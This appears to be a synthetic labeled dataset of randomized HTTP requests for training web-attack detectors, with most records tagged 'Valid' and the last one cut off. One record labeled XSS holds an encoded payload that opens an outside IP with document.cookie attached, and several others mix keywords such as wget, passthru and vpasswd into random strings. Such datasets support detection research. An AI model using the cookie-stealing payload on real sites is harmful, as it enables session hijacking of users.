Via: FTP/3.5 191.11.233.201, 3.5 145.58.204.159, FTP/0.5 30.194.150.14:32964
Transfer-Encoding: deflate
Upgrade: ireEu/5.5
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22095
Start - Id: 7202
class: Valid
POST /oU/d7bK/sKgUjmvQrmeS/sy6pQiDk8MazlqnmTnso/OeD./ehtTsoeemlrejw1e/eM_8BvCL_FpIjdGCl2Ay/iM1-x5UKGS/1jo0XN4cattmpx.tiff? HTTP/1.1
Content-Length: 119
Content-Language: ofmteyee
Content-Encoding: compress
Content-Location: http://www.B1yoathw.com/ayidle/nesea/iteie7/Xpsta97.tar.gz
Content-MD5: eEFxb3JmZW95eWNEZ2R0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Dec 06 12:07:46 UTC
Last-Modified: Tue, 05 Dec 06 20:40:36 GMT
Host: www.eeS3ytt.st:33
Connection: close
Accept: application/rtf;q=0.9, application/x-tar;q=0.2
Accept-Charset: windows-1252;q=0.5, x-mac-japanese, cp-950
Accept-Encoding: gzip;q=0.6, gzip;q=0.3, deflate;q=0.2, gzip;q=0.4
Accept-Language: *;q=0.5
Cache-Control: nlahvdTb='atrikb'
Client-ip: 255.188.160.16
Cookie: na=e0;dabietaW=3nmitueg;t2oorl=3579
Cookie2: $Version="7"
Date: Fri, 20 Jun 08 18:10:24 GMT
ETag: W/"rn6sybHKNVxYy6EGGhl"
Expect: trnhhu
From: rnaa5sa6@a60sretsto.org
If-Modified-Since: Sun, 15 Feb 04 15:56:18 UTC
If-Unmodified-Since: Wed, 01 Mar 06 12:08:15 CET
If-Match: "y9DmsGS97fWG6MV7"
If-None-Match: "0oRJZOwg46uSF4_tGm"
If-Range: *
Max-Forwards: 175
MIME-Version: 4.7
Pragma: iUi='telQrBc'
Proxy-Authorization: Digest nc=9f15Ac7e
Authorization: tdstnc daeosst0=eshteist
Range: 835-,-3,7-0
Referer: /eeheaf/auhaoei/rSmsum/aaner/n46l.php
TE: trailers
Trailer: TE
User-Agent: Mozilla/2.8 (Windows; U; Win98 2.5; mr-tw; rv:9.9.6) Gecko/93122284
UA-CPU: Sparc
UA-Disp: 5578,6674,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 629x010
Via: HTTP/9.8 www.lisxu80.shtml, uewc8/0.2 160.37.144.101, 2.7 www.finsaip.jpg
Transfer-Encoding: gzip
Upgrade: nctee/4.4, seyc/3.3, leTnv/8.7
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 62.39.133.239
X-Serial-Number: 741957676224840602
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

e3=evgIJe&9sereoierdiE=4o&didfdynaOiae=roirt4da&httpWDA1X=iw&oe6hn=lf0srbtcie&nullCPLW=nbIEcZmkb&wi=fqptw&dEsss=o ws=

End - Id: 7202
Start - Id: 9437
class: Valid
GET /6eFoierT5wtyy.jpeg?Iy3TW=sock_streamaf&hntyliru=69&GM5jspschild.includea=86402320 HTTP/1.1
Host: www.eEea.st
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nQeourts-u0x7h;q=0.1
Cache-Control: no-store
Client-ip: 62.227.216.236
Cookie: eTttN=sfjv7
Cookie2: $Version="029"
Date: Fri, 06 Jun 08 14:40:53 CET
ETag: W/"t0GK3rq@Ccs.7X89-Zn"
Expect: a2deeos=4evRn;Otep
From: knet@3letsbcnia.it
If-Modified-Since: Wed, 30 Aug 06 21:54:58 UTC
If-Unmodified-Since: Sun, 21 Dec 08 09:57:33 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Oct 05 11:20:34 UTC
Max-Forwards: 33
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: uide iwlucnv=bfge1or
Authorization: Tjcejq natSeewe=j3rsHta
Range: 13-1,-254711
Referer: /tott/aciTybr1.nsf
TE: gzip,trailers,gzip
Trailer: User-Agent
User-Agent: iicOeaiaeHll
UA-CPU: Sparc
UA-Disp: 269,5048,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 383x664
Via: 3.6 www.egeb.htm:22, HTTP/2.7 129.110.224.22, FTP/3.9 164.92.168.144
Transfer-Encoding: identity
Upgrade: n1s/5.5, lmwiso/3.8, Tal9/6.5, E6Ia/4.3
Warning: 681 www.swfai8dd.jpg:43694 "ecm0herqsI3eelSca8Cl" "Fri, 15 May 09 17:24:55 UTC"
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9437
Start - Id: 2858
class: Valid
GET /v_7RvZ9j8XZ@tvZa/Q2re9sizoolnsiednlS.tiff?otfoe=20&de6bEniHadfoqn=yeCnnEaaeap HTTP/1.0
Host: www.dEeLeiRi.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.0, x-mac-roman;q=0.7, windows-1258, x-mac-korean
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 158.206.60.147
Cookie: ftehrnmh=soiolSsu1Urv;WBIp7=eJU.X;passthru@Not=eo4se>
Cookie2: $Version="6"
Date: Thu, 17 Jun 04 02:09:09 UTC
ETag: "NjhsqOtV49g9a9O"
Expect: onRsl=cpiaO5dE;Hl6de
From: 7mot@etshy.biz
If-Modified-Since: Fri, 04 Dec 09 04:15:59 UTC
If-Unmodified-Since: Mon, 14 Sep 09 21:51:54 UTC
If-Match: "yokQyT44r0@DWXORCjY"
If-None-Match: *
If-Range: *
Max-Forwards: 91
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic bmFtYWg6NXMyYXY=
Authorization: Basic c3JpZ2FlSWU6ZTg4ZnloYg==
Range: 839-599
Referer: /oosf/t0as/x2syT/wiSies/fOatetl.htm
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 3.3; jo-gq; rv:0.8.1) Gecko/78912072
UA-CPU: Sparc
UA-Disp: 9780,426,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0527x960
Via: 3.7 www.cbnamct.tiff, O9teot/8.9 www.1Raee.css:4734
Transfer-Encoding: compress
Upgrade: dp5e/7.1, 6Wocs/8.4, sytonn/2.0, a4edeH/0.9
Warning: 820 www.ihNeie.html "srgeAedfihnrsmewv" 
X-Forwarded-For: 205.119.197.218
X-Serial-Number: 13572
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2858
Start - Id: 47648
class: XSS
GET /meR9jmo/tLlSbYaFzioxgjF/ciieCfti/sVKvkU9WgBXGi5K/41i6nsmqreczetoscoa/a@9Df/0fviiIeiaeO9arfj0e/sSV4379PN5Zuwfm1.jpeg?p3gMPC=+io%5Di&vEbZevalIGWr=tYmZA&d@pHwo=xt6h0fh+dkctelnetee&bTuuiaaine=%3Cobject+++classid%3D+%22clsid%3A...++++%22+codebase+++%3D+%22javascript%3A++%5Bwindow.open%28%27http%3A%2F%2F13.153.95.4%2Ftosi.aspx%27%2Bdocument.cookie%29%3B%5D+%22++++%3E HTTP/1.0
Host: www.leren.st
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.7, compress, gzip;q=0.7
Accept-Language: dhteep3e-ae;q=0.8, 5tEq-nhz
Cache-Control: only-if-cached
Client-ip: 168.210.69.11
Cookie: pet=97458329;vsna3ou=uMOf;3nhdmw=Pi
Cookie2: $Version="06"
Date: Wed, 06 Feb 08 20:41:02 UTC
ETag: W/"HdQF3OlRjugb5Pl2R"
Expect: gsitea=ehsi
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 01 Apr 10 02:33:43 UTC
If-Unmodified-Since: Mon, 06 Oct 08 12:31:28 UTC
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: *
Max-Forwards: 21
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="3e6AFcBd3DB6A9c456a7BdCF530D3E27"
Range: 51-,059585-
Referer: /siyuT/rjfnR8/fha2nh/ogenrxgm.mpeg
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 2.1; an-s1; rv:2.8.7) Gecko/69018492
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: soni/1.0 www.lqtsEi.js, 8.0 249.102.209.83
Transfer-Encoding: gzip
Upgrade: aeel/6.8, 8r7lst/5.1, dcuh/5.3, we7c9e/0.8
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47648
Start - Id: 14694
class: Valid
GET /aVJKW07W1/uTX7dHMdDZif9/qTnc-TXSxS/oWgMWUJ/ihhn2qhayitubhvgnsyd/vpasswdwV0/nqOtj.jcLhJQaokz/eot/kU7STNMe6fx2iV0rP.bin? HTTP/1.0
Host: www.XsMu.de
Connection: se4tFocw
Accept: */*
Accept-Charset: windows-1254;q=0.3, hz-gb-2312, iso-2022-jp;q=0.0, utf-8;q=0.1, x-mac-arabic;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 27.223.229.132
Cookie: 4whEEhleryt2=658913541;Eed38ho=653
Cookie2: $Version="0"
Date: Thu, 12 Aug 04 16:58:11 GMT
ETag: "uHBn0QQncCl0QP7G0hfy"
Expect: acVi
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Fri, 05 Sep 08 07:00:48 CET
If-Unmodified-Since: Mon, 30 Jul 07 23:45:33 CET
If-Match: "5YhNsaKm05kJVp1H"
If-None-Match: *
If-Range: "cZMzV0nTUZBq39y-n16"
Max-Forwards: 2
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="npnmesR"
Authorization: Basic cmF5bmVhc3M6aG96b2dsMQ==
Range: 07-
Referer: /hdcsdnsv/etsiE/tTtntq3/trCS/leryhtn.dll
TE: gzip;q=0.4,trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.0 (compatible; Konqueror/4.0; Mac OS X; rbdhcam6e; Rden)
UA-CPU: x86
UA-Disp: 8733,634,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0368x227
Via: 2.5 www.lebaue.tiff
Transfer-Encoding: identity
Upgrade: f01ie/0.8
Warning: 475 255.62.238.61 "aoneo" 
X-Forwarded-For: 111.65.250.145
X-Serial-Number: 5935364150091795
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 14694
Start - Id: 34263
class: Valid
PUT /3%uPS4jO4formA_c/styleselect32xfBqb@t8tF_/ai-dxBi/q-aOdc_Bl/lrghd1itcu/ntETKEorbymwnc36cd9D.msf? HTTP/1.0
Content-Length: 203
Content-Language: odutelas
Content-Encoding: compress
Content-Location: /qerl/fnE2on.txt
Content-MD5: dDdtcmVsdGVzbklhYTZzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Dec 04 01:36:26 GMT
Last-Modified: Sat, 17 Sep 05 08:01:20 GMT
Host: www.dt6ynbee.de
Connection: keep-alive
Accept: text/html;q=0.6, text/*;q=0.2, text/*
Accept-Charset: euc-cn;q=0.4, windows-1253;q=0.4, iso-8859-7, iso-8859-1, utf-8;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-age=2
Client-ip: 203.243.153.73
Cookie: epdeo67bthgr=itt;aS7xo=ueibrvt3i1rae3nsdk;oahn4ehasc=0;bnSt1mqHettyueh=ltsoaducedf0oeVr;vdwie=t:7re7&oth7cij
Cookie2: $Version="47"
Date: Sat, 13 Mar 10 06:32:08 UTC
ETag: "R6VU5sbfP0eyLNEcx"
Expect: asoed
From: uoRceh@bnhno.gov
If-Modified-Since: Mon, 17 Jan 05 22:53:01 UTC
If-Unmodified-Since: Wed, 23 Apr 08 08:41:47 UTC
If-Match: "p24kGP1g.xvrvSB2I"
If-None-Match: "ob7rAu.MyF_noGrAgEYN"
If-Range: "@4TQRKd_Sg-6_iU"
Max-Forwards: 64
MIME-Version: 4.2
Pragma: n23thi=t9l81v
Proxy-Authorization: NTLM c2k3QXN0dHNVa2FhM3hhZWlydGhjb3FOZWl1c2JjbmFp
Authorization: Basic bHRuaHVpYTpzaGZ4ag==
Range: 3-7,8-
Referer: /ne9nYahs/Cwcbs/bncnl/cehevo.jsp
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: wreAda71o (hwSd-RRX; aS1sZl; gBvZuEL)
UA-CPU: 68000
UA-Disp: 1874,1837,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6505x533
Via: 8.0 www.ds0geGi9.css:4
Transfer-Encoding: identity
Upgrade: ezhTe/9.1, i0t/1.3, huh/6.9, rDvATi/7.5
Warning: 954 www.nnennttt.js "hztaw" "Sat, 16 Oct 04 21:52:44 UTC"
X-Forwarded-For: 60.98.250.76
X-Serial-Number: 316874692201616
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

th=lt:Oi&sRvi2l=9-WSiQEoz8&zeiln6xdT=0665144526&3TGlPhtpassiobject=360&ebyrllmS0irat=Yohco&heioYlg4gfmiho=teb&grrchdabuAnGaAs=mls7gneato&tn1E=htoQ&meetgiQ59DrgnbT=9&L8fmq=aWpc5e&ra2gdesasamoetp=nag0c3L

End - Id: 34263
Start - Id: 19221
class: Valid
GET /jeJgw0NqPUv/nQdj9Mnpjfv-.htm?qn0haihn=555997&smvo=42&n4Viel7uh=mal-N HTTP/1.1
Host: 218.9.186.251
Connection: close
Accept: video/quicktime;q=0.9, text/html
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: min-fresh=1659
Client-ip: 110.113.74.90
Cookie: jaAiaeauenn=hachVa;OsjyiehdowgT=5y;rbc=iHLXTH1H;efrtnnevmsagEi=1105423;iniwammRf=ossm;psottcnfal=p7eo
Cookie2: $Version="324"
Date: Fri, 11 Jul 08 21:22:59 GMT
ETag: W/"6qBP1Pb2RL9dUUt"
Expect: 100-continue
From: siiaioee@bal3q.biz
If-Modified-Since: Thu, 03 Jun 04 16:54:07 GMT
If-Unmodified-Since: Thu, 17 Apr 08 15:11:54 CET
If-Match: *
If-None-Match: "gDCCqT0XwE5DKvhW-n1Y"
If-Range: Tue, 04 Apr 06 21:09:30 UTC
Max-Forwards: 0
MIME-Version: 4.0
Pragma: 6vasa=ltatoi
Proxy-Authorization: Digest uri=/8tsi1ee/nreUitch/ynlernls/rylqcbHp/vyr6.shtml
Authorization: ntezn annicE3q=band
Range: 6738-658640
Referer: http://www.lwiaoEtd.net/Urca/tyieeOyg/mtdtde.dll
TE: deflate;q=0.7,trailers
Trailer: User-Agent
User-Agent: Mozilla/7.3 (Windows; U; Windows NT 7.3; fe-EN; rv:6.3.3) Gecko/79167137
UA-CPU: 68000
UA-Disp: 399,520,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 203x411
Via: 3.2 www.Zeee.css, 3.3 www.eaqIn.jpeg
Transfer-Encoding: gzip
Upgrade: deldgt/6.6
Warning: 676 www.eeehz.gif:5 "lhoHd9aieoatonpa" "Wed, 02 Nov 05 03:33:52 UTC"
X-Forwarded-For: 122.211.194.113
X-Serial-Number: 31033243317448893710
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19221
Start - Id: 2908
class: Valid
GET /aJePrpV-19.M@xi/mVcQUST5Q/0ouahebmcacS/QkFtmpwud/eip/EUWpositiononJoVWz@V/ozyVna/Ph/rFU5ktMo/Rk-rand-t3nfOgroup by/iE2Yu.msf?maao=E9n+&cp=9q57T&ueoqssnOielnnxd=cDx&jzeetfeeb=153&aseoaiuir9iqah=o%25udx&LM5CO=658&uhrml3Waom=%2B7goh&rche=21352&nssee=211&D8JT@xha2Rt=2&laiTEtemssna=e-9rp HTTP/1.0
Host: www.dtraeGti.it
Connection: rdiesa
Accept: application/zip, video/mpeg
Accept-Charset: cp-950, iso-8859-8-i, x-mac-greek
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: max-stale=00
Client-ip: 97.193.5.193
Cookie: 1Mr=37;roBqO4fI=e07-3bw;cIrtaat4iHx36=hsok7f;sna=3.yUD7_@8Cg;0i3hgo=3140707;gSL6nt4lBI=htacces?nd e
Cookie2: $Version="795"
Date: Fri, 12 Mar 04 20:58:35 GMT
ETag: W/"z.5DafJvnVRPGIp"
Expect: dtsf=saae
From: oraTcnio@2roehlm.com
If-Modified-Since: Fri, 05 Mar 04 04:28:14 UTC
If-Unmodified-Since: Fri, 11 Apr 08 07:58:05 UTC
If-Match: "bipOwM_YSshA9P48S_a"
If-None-Match: "rq0Zzb6BNQGgsft"
If-Range: Sun, 28 Nov 04 22:38:52 CET
Max-Forwards: 2
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: aHELco LimsO0e=ho98
Authorization: NTLM bnNtc3VpM081ZW5hemFlanRyZnRwb2xlbHJvaXJFaG1nN214ZWtiZWRzdA==
Range: 8-0812,200838-406
Referer: http://edd05h.de/chmeReko/2ys0nte/oje8th/oJdehEai.mdb
TE: gzip;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 8.4; vc-st; rv:9.7.7) Gecko/20349256
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 640x6169
Via: FTP/5.6 91.196.112.101
Transfer-Encoding: szase; a7po=njbtthfa
Upgrade: DalUes/1.8, eai/7.4, 4nntra/8.0, otAS/6.6, rbt4ra/0.8
Warning: 969 www.nthaNniO.tiff "euint3iarnws" "Sat, 08 Aug 09 16:51:19 GMT"
X-Forwarded-For: 160.9.8.226
X-Serial-Number: 440914790634409640
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2908
Start - Id: 6290
class: Valid
POST /lernosoEugosnhusti/wgetm@YcmdXNXMrhomeCscriptsQ/3wA-jcBz72SzR/e9JPu1idcIUEH.swf? HTTP/1.0
Content-Length: 233
Content-Language: ee,1houi
Content-Encoding: identity
Content-Location: http://www.p6snci.biz/lrwou9h/3dlamh.css
Content-MD5: NjlON2hUc0xFMWlhSGxoaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Jun 05 10:10:41 GMT
Last-Modified: Sat, 28 Mar 09 09:24:07 UTC
Host: 193.222.113.153
Connection: keep-alive
Accept: video/*, image/gif;q=0.1, text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 39.82.132.80
Cookie: u2a=0wl
Cookie2: $Version="5"
Date: Fri, 19 Feb 10 23:03:09 CET
ETag: "oxEd@SScH6-wK-wrZrt"
Expect: AoayI=9oElaw
From: ueos@tseotr.biz
If-Modified-Since: Sun, 27 May 07 03:40:11 UTC
If-Unmodified-Since: Wed, 26 Jan 05 15:03:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 922
MIME-Version: 8.4
Pragma: a='phe'
Proxy-Authorization: Basic ZGlpcm1uc3Q6eG5zaGxtaA==
Authorization: NTLM QWx5RGtpbmhvOTJybnR0cnRhZmR3NnRnYXNodHR0am9lYTJvdHNFcEU1c29VYQ==
Range: 10-,-849357
Referer: http://edwhusn.be/Solkdtla.gz
TE: chunked;q=0.3
Trailer: From
User-Agent: nf3yhhhrl2lhsnir
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4033x798
Via: FTP/1.1 211.137.149.127, 0.5 125.73.118.135:92420
Transfer-Encoding: compress
Upgrade: esochH/3.1, ehsqp/5.4, atmg/1.6, Aulr/8.6
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2aninn=8964&lbe2otldT8=?l|i&ztDPTs3optksamYW=wiEeuudtnettloete&selikIG5tmmdrc=3psx1t:no  qlltd&oy=855841652&jxhSPoU=8Kgb8Qz_O&jstEDiceTeewh2=horoTranceeso&Hiacanduym=umwp-wMoeopO&k0L_wgetP=7403320&updateUqJwflRdocumentd.c=23097

End - Id: 6290
Start - Id: 13594
class: Valid
GET /jln3hu/asss0Vhe/n6ov7det/a3oiuews.jpg?ty=rXt&ghp=ieutseeeiiuo7xntn&sd9NugSdtiToC3=bgsoundalaa%2B2n%5Clinkea5%248pPy%40 HTTP/1.0
Host: www.iveeiwq.org
Connection: spaoocme
Accept: application/rtf, application/*
Accept-Charset: windows-1257;q=0.9
Accept-Encoding: identity
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 162.62.214.21
Cookie: elMgell=49tqan9p]lin
Cookie2: $Version="902"
Date: Thu, 24 Jul 08 05:03:13 GMT
ETag: "m4CeWrYrl5LTZ3J6N9"
Expect: tntewoon
From: issst@tutqrpd.biz
If-Modified-Since: Mon, 01 Feb 10 01:43:33 UTC
If-Unmodified-Since: Tue, 16 Oct 07 11:02:16 CET
If-Match: "8haTkWnje2ixW1BUd90"
If-None-Match: "XYt9r1aIgp.OL8PIsJ"
If-Range: Wed, 27 Oct 04 02:54:01 CET
Max-Forwards: 444
MIME-Version: 2.7
Pragma: TAru='eu'
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: Digest response="74c8Ecc3c8a54af9fbDB08FCDb2aBfAd"
Range: 38-,7-
Referer: http://rok1nI.org/xdia/dsiErie.php3
TE: chunked,chunked
Trailer: If-Match
User-Agent: Mozilla/0.0 (Windows; U; Windows NT 9.4; bs-ra; rv:6.3.9) Gecko/62494682
UA-CPU: StrongARM
UA-Disp: 896,6607,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x4900
Via: FTP/2.5 20.240.68.174
Transfer-Encoding: deflate
Upgrade: ksola/7.8, haEuhh/9.9, nrh/5.2, Dl0m/5.1
Warning: 604 www.ireeteni.js "iustbs" "Wed, 09 Sep 09 12:42:12 GMT"
X-Forwarded-For: 124.212.119.141
X-Serial-Number: 70032554284651
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13594
Start - Id: 7784
class: Valid
POST /Pidcayhsd8aol4ndr/ej6EQV23hBTk21tJd/DTJoptC/5eBwJTDfoW35SyzGxf3/Tnren2htst/omopctmone6oat/Ze.bodykh/o-rMR6l.cfm? HTTP/1.0
Content-Length: 56
Content-Language: tddTtaoe
Content-Encoding: identity
Content-Location: http://sterLm.fr/aoeiuo.pdf
Content-MD5: ZmNTYWllYWVhT2Nyc29mYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Apr 04 23:26:56 UTC
Last-Modified: Mon, 31 Dec 07 11:13:18 GMT
Host: www.rslooqee.com:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: gzip, identity;q=0.2
Accept-Language: tra8eih-yin;q=0.6, t6dhu-s6
Cache-Control: only-if-cached
Client-ip: 207.124.74.37
Cookie: aeo=563;SjyaEog=7;tiafIGOqein=SouTssoehihhehae3a
Cookie2: $Version="432"
Date: Sun, 18 Oct 09 12:35:28 UTC
ETag: "Why3H83yM7wv-4u"
Expect: 100-continue
From: 3nDoa8@6am0hOM.biz
If-Modified-Since: Sat, 20 Jun 09 15:54:49 UTC
If-Unmodified-Since: Tue, 18 Apr 06 05:49:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 420
MIME-Version: 6.3
Pragma: ulnr=inae2
Proxy-Authorization: Digest algorithm=SqczEY
Authorization: NTLM bm4wY3hNQW9vZDBhRWVUZW5zZVJpZGliZXNpaWFuMWF5MGNhcm9lNWRkNw==
Range: 934-,-244283,-1145
Referer: http://eenree.biz/3e7e52.exe
TE: trailers,trailers
Trailer: Range
User-Agent: Mozilla/7.2 (Machintosh; U; Mac OS X 7.4; rD-nd; rv:5.3.1) Gecko/25398715
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 669x1617
Via: 3Tipy/4.3 www.wreilap.jpg, 2.6 www.hyuaih.html
Transfer-Encoding: compress
Upgrade: etdnet/8.2
Warning: 722 www.Pehitsc.jpg:19247 "r0lanh" 
X-Forwarded-For: 187.83.170.187
X-Serial-Number: 27066605
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Td=smhleentEhomehcwo&n2yenes3tt1ro=yTcSZdz&te=knruNekmge

End - Id: 7784
Start - Id: 33120
class: Valid
PUT /8C-J1gE2HwWJ/sutI.oqZdOGi.msf? HTTP/1.1
Content-Length: 213
Content-Language: 9v
Content-Encoding: compress
Content-Location: http://c8Coo4ti.be/i1rhiegt/deoh/hnv0/ertl.jpg
Content-MD5: c2duZXByN09SZHNCcm9vbA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Jun 09 09:37:47 CET
Last-Modified: Sat, 27 Mar 10 10:28:29 CET
Host: 14.87.250.181
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 73up4nT-i4e, Oleneo5a-8Am
Cache-Control: max-stale=927
Client-ip: 230.124.221.154
Cookie: ef=isooX;hdrb8siiCtL=lnf;iynSmer=8;npZoaneaiqtcadh=ijufrahmuh;devoEeKmin7=t1UeS52Wl;czw=ginitu
Cookie2: $Version="2"
Date: Tue, 05 Dec 06 24:05:45 GMT
ETag: "bhAOVzwMx7e_s2da"
Expect: lopnwT0=ei8deh
From: ryupoa@thaex.ch
If-Modified-Since: Sat, 09 Oct 04 06:40:33 GMT
If-Unmodified-Since: Sat, 13 Jan 07 09:48:12 GMT
If-Match: *
If-None-Match: "FyT-zhBipSR-cn7X_DG"
If-Range: *
Max-Forwards: 165
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic N3RhN3JuOnVkbW5zZA==
Authorization: NTLM M2NhdWFubmVyTkV0aGdpbm8wb3NlZ3Z5ZGFldGl3OFRlZ2RvNWFlbGViM2FlenRl
Range: 449-,116954-
Referer: http://www.9eeee0tp.de/sdeleis/heAiEE/eidn8roa/leh6.exe
TE: chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: nasbmforz
UA-CPU: PowerPC
UA-Disp: 035,199,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6581x441
Via: 9.5 32.245.181.152, 1.4 www.oe8wosMd.gif, 7.3 12.170.115.127
Transfer-Encoding: gzip
Upgrade: dto/7.0
Warning: 956 www.r68u.htm:49944 "evd84o8ca9e" "Thu, 15 Dec 05 04:21:49 CET"
X-Forwarded-For: 221.12.252.224
X-Serial-Number: 0421946796861302632
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mgeLbea=4670151&sid0e=wa7hrofathmov2da&sh8hwcfh=?iyp&xCd7WMdVwinnti=tif9lh leL8&SVIB84Ivk=bEsRetzdr=t&agAPfcmdrTGg9=tvaddoisteari2q&braoom=96894805&tarnwloeeeirwht=a7eCoeoS&esme=cq&Eimrnnrs=~lq&Rvnn=34181954

End - Id: 33120
Start - Id: 15405
class: Valid
GET /txTxcQwznJ2i71/Q5where55/Tene7uSelanatce/tzuicecoaiaetgh/Uteurr4ieii/r@/tJObE6U7Zelq8mNcKy/ooy/RPstdinnull74bU/thkmaRIWvt8sbo@/weicoT/ae0SeqCvZXs28kAzK7.js?asrifk=%7Ca5&oNi6=308&eio0jeRoUlnAt=cCwiG.&nFjformywindow.openS0dk=i1a.KwTk&tsrtbl=net.9ZlgEMxB&sm=73063&shzectlnltile=bioyinseoniLntor HTTP/1.0
Host: 199.87.197.187:92687
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, gzip, gzip, identity;q=0.7
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 90.204.112.5
Cookie: FPLwsnyNz0ee=81l3;gaptmoemeESais=62917;oT8hhiSmywhcm=ncerlThomefA7priha;dSf1=aGPuLgDr;nn7aeoee=qfboZPb4Le;xsrim0=|L e
Cookie2: $Version="39"
Date: Mon, 25 Feb 08 05:49:58 UTC
ETag: W/"F4a.zqzD89KffrK4sljN"
Expect: 100-continue
From: ttti1edt@t4dbecae.uk
If-Modified-Since: Sun, 31 May 09 17:03:57 CET
If-Unmodified-Since: Wed, 06 Oct 04 24:55:24 GMT
If-Match: "Ca6Dgv9GKE28iFRoGK8"
If-None-Match: *
If-Range: Sun, 07 Jun 09 17:32:51 CET
Max-Forwards: 8
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: eeaeg nrstl=TnFalO8t
Authorization: l2laeo gdse9oe=rtdldo
Range: 9-62,54186-,361-
